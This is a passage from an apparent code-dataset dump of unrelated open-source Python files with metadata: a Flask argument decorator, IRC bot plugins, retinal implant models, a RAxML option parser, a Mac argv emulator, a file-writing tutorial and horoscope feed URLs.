"path": "branches/guifix/mcproxy/hooks.py",
"copies": "1",
"size": "3475",
"license": "mit",
"hash": -2566379692144152600,
"line_mean": 38.5,
"line_max": 142,
"alpha_frac": 0.728057554,
"autogenerated": false,
"ratio": 3.0806737588652484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4308731312865248,
"avg_score": null,
"num_lines": null
} |
"""Arguments parsing"""
from copy import deepcopy
from functools import wraps
from webargs.flaskparser import FlaskParser
class ArgumentsMixin:
"""Extend Blueprint to add arguments parsing feature"""
ARGUMENTS_PARSER = FlaskParser()
def arguments(
self, schema, *, location='json', content_type=None, required=True,
description=None, example=None, examples=None, **kwargs
):
"""Decorator specifying the schema used to deserialize parameters
:param type|Schema schema: Marshmallow ``Schema`` class or instance
used to deserialize and validate the argument.
:param str location: Location of the argument.
:param str content_type: Content type of the argument.
Should only be used in conjunction with ``json``, ``form`` or
``files`` location.
The default value depends on the location and is set in
``Blueprint.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING``.
This is only used for documentation purpose.
:param bool required: Whether argument is required (default: True).
:param str description: Argument description.
:param dict example: Parameter example.
:param list examples: List of parameter examples.
:param dict kwargs: Keyword arguments passed to the webargs
:meth:`use_args <webargs.core.Parser.use_args>` decorator used
internally.
The `required` and `description` only affect `body` arguments
(OpenAPI 2) or `requestBody` (OpenAPI 3), because the docs expose the
whole schema. For other locations, the schema is turned into an array
of parameters and the required/description value of each parameter item
is taken from the corresponding field in the schema.
The `example` and `examples` parameters are mutually exclusive and
should only be used with OpenAPI 3 and when location is ``json``.
See :doc:`Arguments <arguments>`.
"""
# At this stage, put schema instance in doc dictionary. Il will be
# replaced later on by $ref or json.
parameters = {
'in': location,
'required': required,
'schema': schema,
}
if content_type is not None:
parameters['content_type'] = content_type
if example is not None:
parameters['example'] = example
if examples is not None:
parameters['examples'] = examples
if description is not None:
parameters['description'] = description
def decorator(func):
@wraps(func)
def wrapper(*f_args, **f_kwargs):
return func(*f_args, **f_kwargs)
# Add parameter to parameters list in doc info in function object
# The deepcopy avoids modifying the wrapped function doc
wrapper._apidoc = deepcopy(getattr(wrapper, '_apidoc', {}))
wrapper._apidoc.setdefault('parameters', []).append(parameters)
# Call use_args (from webargs) to inject params in function
return self.ARGUMENTS_PARSER.use_args(
schema, locations=[location], **kwargs)(wrapper)
return decorator
| {
"repo_name": "Nobatek/flask-rest-api",
"path": "flask_rest_api/arguments.py",
"copies": "1",
"size": "3261",
"license": "mit",
"hash": -6077204903436500000,
"line_mean": 40.8076923077,
"line_max": 79,
"alpha_frac": 0.6335479914,
"autogenerated": false,
"ratio": 4.925981873111782,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 78
} |
#Arguments_RAxML.py
#version 1.0.1
# For use with runRAxML.py
# Only very limited options have been coded.
import os, optparse
def getParser():
parser = optparse.OptionParser()
#general options
#parser.add_option('-x', dest = 'rapidBootstrapRandomNumberSeed', type='int', default = 12345, help = 'Random seed for rapid bootstrap.')
#parser.add_option('-p', dest = 'parsimonyRandomSeed' , type='int', default = 12345, help = 'Random seed for parsimony.')
#parser.add_option('-N', dest = 'numberOfRuns' , type='int', default = 1 , help = 'Number of runs.')
#parser.add_option('-k', dest = 'BLOnBootstrapTrees' , default = None , help = 'Output Bootstrap as branch length')
#parser.add_option('-f', dest = 'algorithm' , default = "a" , help = 'Algorithm to use')
#parser.add_option('-m', dest = 'substitutionModel' , default = "GTRGAMMA" , help = 'Substitution model')
#parser.add_option('-s', dest = 'filename' , default = None , help = 'filename of data.')
#parser.add_option('-n', dest = 'outputFilename' , default = None , help = 'Output filename.')
parser.add_option('-R', dest = 'RAxMLCommand' , default = "-f a" , help = 'RAxML command in quotes.')
return parser
def buildArgList(whichArgs, options):
#build arguments for later submit files
args = ""
if( "R" in whichArgs ):
args += options.RAxMLCommand
return args
#if( "x" in whichArgs ): args += " -x " + str(options.rapidBootstrapRandomNumberSeed)
#if( "p" in whichArgs ): args += " -p " + str(options.parsimonyRandomSeed)
#if( "N" in whichArgs ): args += " -N " + str(options.numberOfRuns)
#if( "k" in whichArgs ): args += " -k"
#if( "f" in whichArgs ): args += " -f " + options.algorithm
#if( "m" in whichArgs ): args += " -m " + options.substitutionModel
#if( "n" in whichArgs ): args += " -s " + options.filename
#if( "s" in whichArgs ): args += " -n " + options.outputFilename
return args
| {
"repo_name": "BotanyHunter/RAxML",
"path": "arguments_RAxML.py",
"copies": "1",
"size": "2194",
"license": "mit",
"hash": 1632224071733857500,
"line_mean": 48.8636363636,
"line_max": 142,
"alpha_frac": 0.5683682771,
"autogenerated": false,
"ratio": 3.4936305732484074,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9318447666880807,
"avg_score": 0.04871023669352015,
"num_lines": 44
} |
arguments = ["self", "info", "args"]
helpstring = "chanadduser <nick>"
minlevel = 3
def main(connection, info, args) :
"""Adds a user to the channel sonicbot access list"""
if args[1] in connection.users["users"] :
if connection.users["users"][args[1]]["userlevel"] >= 2 :
if connection.users["users"][args[1]]["userlevel"] == 2 :
connection.users["users"][args[1]]["userlevel"] = 3
connection.users.sync()
if not connection.users["users"][args[1]].has_key("channels") :
connection.users["users"][args[1]]["channels"] = []
connection.users.sync()
if info["channel"] not in connection.users["users"][args[1]]["channels"] :
connection.users["users"][args[1]]["channels"].append(info["channel"])
connection.users.sync()
connection.ircsend(info["channel"], _("Added %(nick)s to the %(channel)s sonicbot access list.") % dict(nick=args[1], channel=info["channel"]))
else :
connection.ircsend(info["channel"], _("That user is already on this channel's sonicbot access list"))
else : connection.ircsend(info["channel"], _("That user is not yet registered!"))
else : connection.ircsend(info["channel"], _("That user is not yet registered!"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/chanadduser.py",
"copies": "1",
"size": "1339",
"license": "bsd-3-clause",
"hash": 5893471017838653000,
"line_mean": 59.8636363636,
"line_max": 159,
"alpha_frac": 0.5892457058,
"autogenerated": false,
"ratio": 3.997014925373134,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5086260631173134,
"avg_score": null,
"num_lines": null
} |
arguments = ["self", "info", "args"]
helpstring = "chanreg"
minlevel = 2
def main(connection, info, args) :
"""Registers a channel with sonicbot"""
if auth(connection, info) :
if connection.users["users"][info["sender"]]["userlevel"] == 2 :
connection.users["users"][info["sender"]]["userlevel"] = 3
connection.users.sync()
if not connection.users["users"][info["sender"]].has_key("channels") :
connection.users["users"][info["sender"]]["channels"] = []
connection.users.sync()
if info["channel"] not in connection.users["users"][info["sender"]]["channels"] :
connection.users["users"][info["sender"]]["channels"].append(info["channel"])
connection.users.sync()
connection.users["channels"][info["channel"]]["registered"] = True
connection.users.sync()
connection.msg(info["channel"], _("%(sender)s: You have just registered %(channel)s") % dict(sender=info["sender"], channel=info["channel"]))
else : connection.msg(info["channel"], _("%(sender)s: You are already on this channel's sonicbot access list!") % dict(sender=info["sender"]))
else : connection.msg(info["channel"], _("%(sender)s: You do not have at least half-ops on this channel. If this is an error, please kick me and invite me again.") % dict(sender=info["sender"]))
def auth(connection, info) :
"""Checks to see if the sender has at least half-ops in the channel"""
for mode in connection.chanmodes[info["channel"]][info["sender"]] :
if mode in ["!", "~", "@", "%", "&"] :
return True
return False
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/chanreg.py",
"copies": "1",
"size": "1653",
"license": "bsd-3-clause",
"hash": -6766384353274021000,
"line_mean": 58.0357142857,
"line_max": 199,
"alpha_frac": 0.6110102843,
"autogenerated": false,
"ratio": 3.983132530120482,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5094142814420483,
"avg_score": null,
"num_lines": null
} |
arguments = ["self", "info", "args"]
minlevel = 3
helpstring = "disable <plugin>"
def main(connection, info, args) :
"""Disables a plugin"""
if args[1] not in ["disable", "enable", "*"] :
if args[1] in connection.users["channels"][info["channel"]]["enabled"] :
connection.users["channels"][info["channel"]]["enabled"].remove(args[1])
connection.users.sync()
connection.ircsend(info["channel"], _("The %(pluginname)s plugin has been disabled in this channel") % dict(pluginname=args[1]))
else : connection.ircsend(info["channel"], "That plugin is not enabled!")
elif args[1] in ["enable", "disable"] : connection.ircsend(info["channel"], _("You cannot disable the disable or enable commands!"))
elif args[1] == "*" :
for plugin in connection.plugins["pluginlist"].pluginlist :
if plugin not in ["enable", "disable"] and plugin in connection.users["channels"][info["channel"]]["enabled"]:
connection.users["channels"][info["channel"]]["enabled"].remove(plugin)
connection.users.sync()
print plugin
connection.ircsend(info["channel"], _("All plugins have been disabled for this channel"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/disable.py",
"copies": "1",
"size": "1231",
"license": "bsd-3-clause",
"hash": -6061289414388785000,
"line_mean": 60.55,
"line_max": 140,
"alpha_frac": 0.6238830219,
"autogenerated": false,
"ratio": 4.158783783783784,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5282666805683784,
"avg_score": null,
"num_lines": null
} |
arguments = ["self", "info", "args"]
minlevel = 3
helpstring = "enable <plugin>"
def main(connection, info, args) :
"""Enables a plugin"""
if args[1] not in ["disable", "enable", "*"] :
if args[1] not in connection.users["channels"][info["channel"]]["enabled"] :
connection.users["channels"][info["channel"]]["enabled"].append(args[1])
connection.users.sync()
connection.ircsend(info["channel"], _("The %(pluginname)s plugin has been enabled in this channel") % dict(pluginname=args[1]))
else : connection.ircsend(info["channel"], _("That plugin is not disabled!"))
elif args[1] in ["enable", "disable"] : connection.ircsend(info["channel"], _("You cannot enable the disable or enable commands!"))
elif args[1] == "*" :
for plugin in connection.plugins["pluginlist"].pluginlist :
if plugin not in ["enable", "disable"] and plugin not in connection.users["channels"][info["channel"]]["enabled"]:
connection.users["channels"][info["channel"]]["enabled"].append(plugin)
connection.users.sync()
connection.ircsend(info["channel"], _("All plugins have been enabled for this channel"))
| {
"repo_name": "sonicrules1234/sonicbot",
"path": "oldplugins/enable.py",
"copies": "1",
"size": "1209",
"license": "bsd-3-clause",
"hash": 1152776277062208100,
"line_mean": 62.6315789474,
"line_max": 139,
"alpha_frac": 0.6277915633,
"autogenerated": false,
"ratio": 4.08445945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521225102275946,
"avg_score": null,
"num_lines": null
} |
#Arguments used by the algorithm
# POP_SIZE = [25,50]
# LK_PERCENTAGE = [0,0.2]
# NEW_POP_TYPE = [0,1,2,3]
# N_BEST = [5]
# RESET_PERCENTAGE = [0.5]
# NEW_TOUR_MODE = [2]
POP_SIZE = [25]
LK_PERCENTAGE = [0]
NEW_POP_TYPE = [0,1,2]
N_BEST = [5]
RESET_PERCENTAGE = [0.5]
NEW_TOUR_MODE = [2]
#run 0
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 0
# N_BEST = 3
#run 1
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 1
# N_BEST = 3
#run 2
# POP_SIZE = [50, 75, 100]
# LK_PERCENTAGE = [0, 0.1, 0.2]
# NEW_POP_TYPE = 2
# N_BEST = 3
#Number of times the algorithm should run in each set of configs
NUMBER_OF_RUNS = 1
#list of datasets for the algorithm
#TOURS = ["a280","att48","berlin52","burma14","ch150","eil101","gr137","pbd984","pcb442","u1432"]
#TOURS = ["att48","berlin52","eil101","ch150","a280","gr137"]
# TOURS = ['berlin52','att48','eil101']
TOURS = ['berlin52','att48']
# TOURS = ['ch150','a280']
#Path to TSP folder and executables, change only if you change the project folder structure
LIBS_PATH = "tsp/"
BIN_PATH = "bin/"
| {
"repo_name": "GAStudyGroup/GPX2",
"path": "scp/configs.py",
"copies": "1",
"size": "1249",
"license": "mit",
"hash": -4044112069713661400,
"line_mean": 26.152173913,
"line_max": 97,
"alpha_frac": 0.5396317054,
"autogenerated": false,
"ratio": 2.379047619047619,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8320266244858479,
"avg_score": 0.019682615917828054,
"num_lines": 46
} |
"""`ArgusI`, `ArgusII`"""
import numpy as np
from collections import OrderedDict
from .base import ProsthesisSystem
from .electrodes import DiskElectrode
from .electrode_arrays import ElectrodeGrid
class ArgusI(ProsthesisSystem):
"""Create an Argus I array on the retina
This function creates an Argus I array and places it on the retina
such that the center of the array is located at 3D location (x,y,z),
given in microns, and the array is rotated by rotation angle ``rot``,
given in radians.
Argus I is a modified cochlear implant containing 16 electrodes in a 4x4
array with a center-to-center separation of 800 um, and two electrode
diameters (250 um and 500 um) arranged in a checkerboard pattern
[Yue2020]_.
The array is oriented in the visual field as shown in Fig. 1 of
[Horsager2009]_; that is, if placed in (0,0), the top two rows will lie in
the lower retina (upper visual field):
.. raw:: html
<pre>
-->x A1 B1 C1 D1 260 520 260 520
| A2 B2 C2 D2 where electrode 520 260 520 260
v A3 B3 C3 D3 diameters are: 260 520 260 520
y A4 B4 C4 D4 520 260 520 260
</pre>
Electrode order is: A1, B1, C1, D1, A2, B2, ..., D4.
If ``use_legacy_names`` is True, electrode order is: L6, L2, M8, M4, ...
An electrode can be addressed by name, row/column index, or integer index
(into the flattened array).
.. note::
Column order is reversed in a left-eye implant.
Parameters
----------
x : float, optional
x coordinate of the array center (um)
y : float, optional
y coordinate of the array center (um)
z : float or array_like, optional
Distance of the array to the retinal surface (um). Either a list
with 16 entries or a scalar.
rot : float, optional
Rotation angle of the array (rad). Positive values denote
counter-clock-wise (CCW) rotations in the retinal coordinate
system.
eye : {'RE', 'LE'}, optional
Eye in which array is implanted.
Examples
--------
Create an Argus I array centered on the fovea, at 100um distance from
the retina:
>>> from pulse2percept.implants import ArgusI
>>> ArgusI(x=0, y=0, z=100, rot=0) # doctest: +NORMALIZE_WHITESPACE
ArgusI(earray=ElectrodeGrid, eye='RE', shape=(4, 4),
stim=None)
Get access to electrode 'B1', either by name or by row/column index:
>>> argus = ArgusI(x=0, y=0, z=100, rot=0)
>>> argus['B1']
DiskElectrode(r=250.0, x=-400.0, y=-1200.0, z=100.0)
>>> argus[0, 1]
DiskElectrode(r=250.0, x=-400.0, y=-1200.0, z=100.0)
"""
# Frozen class: User cannot add more class attributes
__slots__ = ('shape',)
def __init__(self, x=0, y=0, z=0, rot=0, eye='RE', stim=None,
use_legacy_names=False):
self.eye = eye
self.shape = (4, 4)
r_arr = np.array([250, 500, 250, 500]) / 2.0
r_arr = np.concatenate((r_arr, r_arr[::-1], r_arr, r_arr[::-1]),
axis=0)
spacing = 800.0
# In older papers, Argus I electrodes go by L and M:
old_names = names = ['L6', 'L2', 'M8', 'M4',
'L5', 'L1', 'M7', 'M3',
'L8', 'L4', 'M6', 'M2',
'L7', 'L3', 'M5', 'M1']
names = old_names if use_legacy_names else ('1', 'A')
self.earray = ElectrodeGrid(self.shape, spacing, x=x, y=y, z=z,
rot=rot, etype=DiskElectrode, r=r_arr,
names=names)
# Beware of race condition: Stim must be set last, because it requires
# indexing into self.electrodes:
self.stim = stim
# Set left/right eye:
if not isinstance(eye, str):
raise TypeError("'eye' must be a string, either 'LE' or 'RE'.")
if eye != 'LE' and eye != 'RE':
raise ValueError("'eye' must be either 'LE' or 'RE'.")
self.eye = eye
# Unfortunately, in the left eye the labeling of columns is reversed...
if eye == 'LE':
# FIXME: Would be better to have more flexibility in the naming
# convention. This is a quick-and-dirty fix:
names = list(self.earray.keys())
objects = list(self.earray.values())
names = np.array(names).reshape(self.earray.shape)
# Reverse column names:
for row in range(self.earray.shape[0]):
names[row] = names[row][::-1]
# Build a new ordered dict:
electrodes = OrderedDict()
for name, obj in zip(names.ravel(), objects):
electrodes.update({name: obj})
# Assign the new ordered dict to earray:
self.earray.electrodes = electrodes
def _pprint_params(self):
"""Return dict of class attributes to pretty-print"""
params = super()._pprint_params()
params.update({'shape': self.shape})
return params
class ArgusII(ProsthesisSystem):
"""Create an Argus II array on the retina
This function creates an Argus II array and places it on the retina
such that the center of the array is located at (x,y,z), given in
microns, and the array is rotated by rotation angle ``rot``, given in
radians.
Argus II contains 60 electrodes of 225 um diameter arranged in a 6 x 10
grid (575 um center-to-center separation) [Yue2020]_.
The array is oriented upright in the visual field, such that an
array with center (0,0) has the top three rows lie in the lower
retina (upper visual field), as shown below:
.. raw:: html
<pre>
A1 A2 A3 A4 A5 A6 A7 A8 A9 A10
-- x B1 B2 B3 B4 B5 B6 B7 B8 B9 B10
| C1 C2 C3 C4 C5 C6 C7 C8 C9 C10
v D1 D2 D3 D4 D5 D6 D7 D8 D9 D10
y E1 E2 E3 E4 E5 E6 E7 E8 E9 E10
F1 F2 F3 F4 F5 F6 F7 F8 F9 F10
</pre>
Electrode order is: A1, A2, ..., A10, B1, B2, ..., F10.
An electrode can be addressed by name, row/column index, or integer index
(into the flattened array).
.. note::
Column order is reversed in a left-eye implant.
Parameters
----------
x : float
x coordinate of the array center (um)
y : float
y coordinate of the array center (um)
z: float or array_like
Distance of the array to the retinal surface (um). Either a list
with 60 entries or a scalar.
rot : float
Rotation angle of the array (rad). Positive values denote
counter-clock-wise (CCW) rotations in the retinal coordinate
system.
eye : {'RE', 'LE'}, optional
Eye in which array is implanted.
Examples
--------
Create an ArgusII array centered on the fovea, at 100um distance from
the retina:
>>> from pulse2percept.implants import ArgusII
>>> ArgusII(x=0, y=0, z=100, rot=0) # doctest: +NORMALIZE_WHITESPACE
ArgusII(earray=ElectrodeGrid, eye='RE', shape=(6, 10),
stim=None)
Get access to electrode 'E7', either by name or by row/column index:
>>> argus = ArgusII(x=0, y=0, z=100, rot=0)
>>> argus['E7']
DiskElectrode(r=112.5, x=862.5, y=862.5, z=100.0)
>>> argus[4, 6]
DiskElectrode(r=112.5, x=862.5, y=862.5, z=100.0)
"""
# Frozen class: User cannot add more class attributes
__slots__ = ('shape',)
def __init__(self, x=0, y=0, z=0, rot=0, eye='RE', stim=None):
self.shape = (6, 10)
r = 225.0 / 2.0
spacing = 575.0
names = ('A', '1')
self.earray = ElectrodeGrid(self.shape, spacing, x=x, y=y, z=z, r=r,
rot=rot, names=names, etype=DiskElectrode)
# Beware of race condition: Stim must be set last, because it requires
# indexing into self.electrodes:
self.stim = stim
# Set left/right eye:
if not isinstance(eye, str):
raise TypeError("'eye' must be a string, either 'LE' or 'RE'.")
if eye != 'LE' and eye != 'RE':
raise ValueError("'eye' must be either 'LE' or 'RE'.")
self.eye = eye
# Unfortunately, in the left eye the labeling of columns is reversed...
if eye == 'LE':
# TODO: Would be better to have more flexibility in the naming
# convention. This is a quick-and-dirty fix:
names = list(self.earray.keys())
objects = list(self.earray.values())
names = np.array(names).reshape(self.earray.shape)
# Reverse column names:
for row in range(self.earray.shape[0]):
names[row] = names[row][::-1]
# Build a new ordered dict:
electrodes = OrderedDict()
for name, obj in zip(names.ravel(), objects):
electrodes.update({name: obj})
# Assign the new ordered dict to earray:
self.earray.electrodes = electrodes
def _pprint_params(self):
"""Return dict of class attributes to pretty-print"""
params = super()._pprint_params()
params.update({'shape': self.shape})
return params
| {
"repo_name": "uwescience/pulse2percept",
"path": "pulse2percept/implants/argus.py",
"copies": "1",
"size": "9355",
"license": "bsd-3-clause",
"hash": 6836969295041147000,
"line_mean": 36.42,
"line_max": 79,
"alpha_frac": 0.5741314805,
"autogenerated": false,
"ratio": 3.4330275229357796,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.450715900343578,
"avg_score": null,
"num_lines": null
} |
# argv[1] - file path to main folder (like $HOME/dsge-models)
# argv[2] - name of model (e.g. 'dsf' or 'nk' or 'ca')
from scipy.io import loadmat
from sys import argv
from json import load
TT = 30 # how many periods of results to send
model = argv[2]
fpath = argv[1] + '/' + model + '_mfiles/'
json = ''
#### 1 - load model results
# load results from mat file and convert to numpy lists
#mat = loadmat(fpath + model + '_results.mat')
#endo_names = mat['M_']['endo_names'].tolist()[0][0]
#endo_simul = mat['oo_']['endo_simul'].tolist()[0][0]
# make string of JSON-looking data out of numpy lists
#for name, simul in zip(endo_names, endo_simul):
# json += '"' + name.strip() + '":'
# json += '[' + ','.join(['%2f' % jj for jj in simul[0:TT]]) + '],'
#### 2 - load extra plot vars
# load results from mat file and convert to numpy lists (new format though)
mat = loadmat(fpath + 'plot_vars.mat')
plot_names = mat['plot_vars'].dtype.names
plot_simul = mat['plot_vars'][0][0]
for name, simul in zip(plot_names, plot_simul):
print 'name: ' + name
json += '"' + name.strip() + '":'
json += '[' + ','.join(['%2f' % jj for jj in simul[0:TT]]) + '],'
# write JSON-looking string to file
f = open(model + '_mfiles/' + model + '_results.json', 'w')
f.write('{' + json[:-1] + '}')
f.close()
# pull JSON data into python dict
json_data = open(fpath + model + '_results.json')
data = load(json_data)
json_data.close()
# pull JSON of short+long var names into python dict
json_names = open(fpath + 'json/var_list.json')
names = load(json_names)
json_names.close()
# make string of public directory
pub_fpath = fpath[:fpath[:-1].rfind('/')] + '/public/'
# create csv file to write to
f = open(pub_fpath + model + '_results.csv','w')
for key in data.keys():
#f.write(str(key) + ', ' + str(data[key])[1:-1] + '\n')
f.write(str(names[key]) + ', ' + str(data[key])[1:-1] + '\n')
f.close()
| {
"repo_name": "wclark3/dsge-models",
"path": "dsf_mfiles/save_results.py",
"copies": "2",
"size": "1975",
"license": "mit",
"hash": 1113913892006379300,
"line_mean": 31.3770491803,
"line_max": 79,
"alpha_frac": 0.5913924051,
"autogenerated": false,
"ratio": 2.9129793510324484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9483922851122588,
"avg_score": 0.004089781001972207,
"num_lines": 61
} |
"""argvemulator - create sys.argv from OSA events. Used by applets that
want unix-style arguments.
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the argvemulator module is removed.", stacklevel=2)
import sys
import traceback
from Carbon import AE
from Carbon.AppleEvents import *
from Carbon import Evt
from Carbon import File
from Carbon.Events import *
import aetools
class ArgvCollector:
"""A minimal FrameWork.Application-like class"""
def __init__(self):
self.quitting = 0
# Remove the funny -psn_xxx_xxx argument
if len(sys.argv) > 1 and sys.argv[1][:4] == '-psn':
del sys.argv[1]
AE.AEInstallEventHandler(kCoreEventClass, kAEOpenApplication, self.__runapp)
AE.AEInstallEventHandler(kCoreEventClass, kAEOpenDocuments, self.__openfiles)
def close(self):
AE.AERemoveEventHandler(kCoreEventClass, kAEOpenApplication)
AE.AERemoveEventHandler(kCoreEventClass, kAEOpenDocuments)
def mainloop(self, mask = highLevelEventMask, timeout = 1*60):
# Note: this is not the right way to run an event loop in OSX or even
# "recent" versions of MacOS9. This is however code that has proven
# itself.
stoptime = Evt.TickCount() + timeout
while not self.quitting and Evt.TickCount() < stoptime:
self._dooneevent(mask, timeout)
if not self.quitting:
print "argvemulator: timeout waiting for arguments"
self.close()
def _dooneevent(self, mask = highLevelEventMask, timeout = 1*60):
got, event = Evt.WaitNextEvent(mask, timeout)
if got:
self._lowlevelhandler(event)
def _lowlevelhandler(self, event):
what, message, when, where, modifiers = event
h, v = where
if what == kHighLevelEvent:
try:
AE.AEProcessAppleEvent(event)
except AE.Error, err:
msg = "High Level Event: %r %r" % (hex(message), hex(h | (v<<16)))
print 'AE error: ', err
print 'in', msg
traceback.print_exc()
return
else:
print "Unhandled event:", event
def _quit(self):
self.quitting = 1
def __runapp(self, requestevent, replyevent):
self._quit()
def __openfiles(self, requestevent, replyevent):
try:
listdesc = requestevent.AEGetParamDesc(keyDirectObject, typeAEList)
for i in range(listdesc.AECountItems()):
aliasdesc = listdesc.AEGetNthDesc(i+1, typeAlias)[1]
alias = File.Alias(rawdata=aliasdesc.data)
fsref = alias.FSResolveAlias(None)[0]
pathname = fsref.as_pathname()
sys.argv.append(pathname)
except Exception, e:
print "argvemulator.py warning: can't unpack an open document event"
import traceback
traceback.print_exc()
self._quit()
if __name__ == '__main__':
ArgvCollector().mainloop()
print "sys.argv=", sys.argv
| {
"repo_name": "MalloyPower/parsing-python",
"path": "front-end/testsuite-python-lib/Python-2.7/Lib/plat-mac/argvemulator.py",
"copies": "73",
"size": "3061",
"license": "mit",
"hash": 2263519014946303000,
"line_mean": 32.2717391304,
"line_max": 85,
"alpha_frac": 0.6164652074,
"autogenerated": false,
"ratio": 3.811955168119552,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.008209821398889818,
"num_lines": 92
} |
"""argvemulator - create sys.argv from OSA events. Used by applets that
want unix-style arguments.
"""
import sys
import traceback
from Carbon import AE
from Carbon.AppleEvents import *
from Carbon import Evt
from Carbon.Events import *
import aetools
class ArgvCollector:
"""A minimal FrameWork.Application-like class"""
def __init__(self):
self.quitting = 0
self.ae_handlers = {}
# Remove the funny -psn_xxx_xxx argument
if len(sys.argv) > 1 and sys.argv[1][:4] == '-psn':
del sys.argv[1]
self.installaehandler('aevt', 'oapp', self.open_app)
self.installaehandler('aevt', 'odoc', self.open_file)
def installaehandler(self, classe, type, callback):
AE.AEInstallEventHandler(classe, type, self.callback_wrapper)
self.ae_handlers[(classe, type)] = callback
def close(self):
for classe, type in self.ae_handlers.keys():
AE.AERemoveEventHandler(classe, type)
def mainloop(self, mask = highLevelEventMask, timeout = 1*60):
stoptime = Evt.TickCount() + timeout
while not self.quitting and Evt.TickCount() < stoptime:
self.dooneevent(mask, timeout)
self.close()
def _quit(self):
self.quitting = 1
def dooneevent(self, mask = highLevelEventMask, timeout = 1*60):
got, event = Evt.WaitNextEvent(mask, timeout)
if got:
self.lowlevelhandler(event)
def lowlevelhandler(self, event):
what, message, when, where, modifiers = event
h, v = where
if what == kHighLevelEvent:
try:
AE.AEProcessAppleEvent(event)
except AE.Error, err:
msg = "High Level Event: %s %s" % \
(`hex(message)`, `hex(h | (v<<16))`)
print 'AE error: ', err
print 'in', msg
traceback.print_exc()
return
else:
print "Unhandled event:", event
def callback_wrapper(self, _request, _reply):
_parameters, _attributes = aetools.unpackevent(_request)
_class = _attributes['evcl'].type
_type = _attributes['evid'].type
if self.ae_handlers.has_key((_class, _type)):
_function = self.ae_handlers[(_class, _type)]
elif self.ae_handlers.has_key((_class, '****')):
_function = self.ae_handlers[(_class, '****')]
elif self.ae_handlers.has_key(('****', '****')):
_function = self.ae_handlers[('****', '****')]
else:
raise 'Cannot happen: AE callback without handler', (_class, _type)
# XXXX Do key-to-name mapping here
_parameters['_attributes'] = _attributes
_parameters['_class'] = _class
_parameters['_type'] = _type
if _parameters.has_key('----'):
_object = _parameters['----']
del _parameters['----']
# The try/except that used to be here can mask programmer errors.
# Let the program crash, the programmer can always add a **args
# to the formal parameter list.
rv = _function(_object, **_parameters)
else:
#Same try/except comment as above
rv = _function(**_parameters)
if rv == None:
aetools.packevent(_reply, {})
else:
aetools.packevent(_reply, {'----':rv})
def open_app(self, **args):
self._quit()
def open_file(self, _object=None, **args):
for alias in _object:
fsr = alias.FSResolveAlias(None)[0]
pathname = fsr.as_pathname()
sys.argv.append(pathname)
self._quit()
def other(self, _object=None, _class=None, _type=None, **args):
print 'Ignore AppleEvent', (_class, _type), 'for', _object, 'Other args:', args
if __name__ == '__main__':
ArgvCollector().mainloop()
print "sys.argv=", sys.argv
| {
"repo_name": "MalloyPower/parsing-python",
"path": "front-end/testsuite-python-lib/Python-2.3/Lib/plat-mac/argvemulator.py",
"copies": "1",
"size": "3922",
"license": "mit",
"hash": 5486657790097544000,
"line_mean": 33.4035087719,
"line_max": 87,
"alpha_frac": 0.5634880163,
"autogenerated": false,
"ratio": 3.782063645130183,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4845551661430183,
"avg_score": null,
"num_lines": null
} |
#argv is a list containing the arguments passed to the python interpreter
from sys import argv
#run this script like this:
#python ex16.py test16.txt
script, filename = argv
#using %r here allow actual commands to be input and converted to strings
#because %r uses repr() instead of str() to convert to a string, ie:
#d = datetime.date.today()
#str(d) returns '2011-05-15'
#repr(d) returns 'datetime.date(2011, 5, 14)'
print "We're going to erase %r." %filename
print "If you don't want that, hit CTRL-C (^C)."
print "If you do want that, hit RETURN."
raw_input("?")
print "Opening the file..."
#w+, r+, and a+ will open a file for reading and writing
target = open(filename, 'w')
print "Truncating the file. Goodbye!"
target.truncate()
print "Now I'm going to ask you for three lines."
#raw_input reads input as a string and assigns to line1,2,3
line1 = raw_input("line 1: ")
line2 = raw_input("line 2: ")
line3 = raw_input("line 3: ")
print "I'm going to write these to the file."
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3 + "\n") #Same as above but in a single line
print "And finally, we close it."
target.close()
print "Here are the contents of the textfile:"
#opening without -w -r or -a like below implicitly uses -r
#-w writes, -r reads, -a appends
target = open(filename)
print target.read()
| {
"repo_name": "liggettla/python",
"path": "ex16.py",
"copies": "1",
"size": "1370",
"license": "mit",
"hash": -4245421582085026300,
"line_mean": 27.5416666667,
"line_max": 73,
"alpha_frac": 0.7065693431,
"autogenerated": false,
"ratio": 3.106575963718821,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4313145306818821,
"avg_score": null,
"num_lines": null
} |
ARIES = "aries"
TAURUS = "taurus"
GEMINI = "gemini"
CANCER = 'cancer'
LEO = 'leo'
VIRGO = 'virgo'
LIBRA = "libra"
SCORPIO = "scorpio"
SAGITTARIUS = "sagittarius"
CAPRICORN = "capricorn"
AQUARIOU = "aquarius"
PISCES = "pisces"
COMMON = "common"
ANIMALS_DICT = {
ARIES: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_aries.xml"
},
TAURUS: {
'daily_common_url': "https://hyrax.ru/rss_daily_common_taurus.xml"
},
GEMINI: {
